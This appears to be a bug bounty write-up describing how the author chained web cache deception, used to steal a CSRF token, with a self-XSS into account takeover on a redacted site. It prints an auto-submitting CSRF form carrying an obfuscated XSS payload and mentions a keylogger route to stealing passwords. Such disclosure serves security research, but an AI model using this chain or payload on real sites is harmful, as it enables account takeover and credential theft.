@bxmbn
This is the second part of my previous Write-Up
So, way back in July, I started testing an app, I noticed the app was behind Akamai, I then created an account and noticed there was a Self-XSS when updating the name
So, to exploit this I just needed to extract the user’s CSRF token by sending a modified URL using a cacheable extension file (.js .css, woff2) to the victim, so the server stores it
Example URL:
https://www.███████/my-account/personal-information.woff2?triagethis
After I extracted the CSRF token, I was then able to send the XSS Payload to the victim
<html>
<body onload="xss.submit();">
<form method = "POST"
action = "https://www.█████████/my-account/update-profile"
id="xss"
style = "display:none">
<input type="hidden" name="CSRFToken" value="replace your stolen token here">
<input type="hidden" name="lname" value="Oauth">
<input type="hidden" name="zipcode" value="07801">
<input type="hidden" name="fname" value="xss","a":top[8680439..toString(30)](document.domain),//">
<input type="hidden" name="dobField" value="04/06/1994">
<input type="submit">
</form>
</body>
</html>
Payload Used:
xss”,”a”:top[8680439..toString(30)](document.domain),//
I then showed, that there was two ways to perform Account Takeover with this exploit, one was just by changing the email with the Stolen CSRF, and requesting a New Password, the other was to use JS to extract the Password using a KeyLogger as the payload was on multiple other pages.
Timeline:
Reported → July 17, 2022
Pending Program Review→ July 20, 2022
Bounty Awarded → August 15, 2022
Next: Atacking Amazon CloudFront CDN
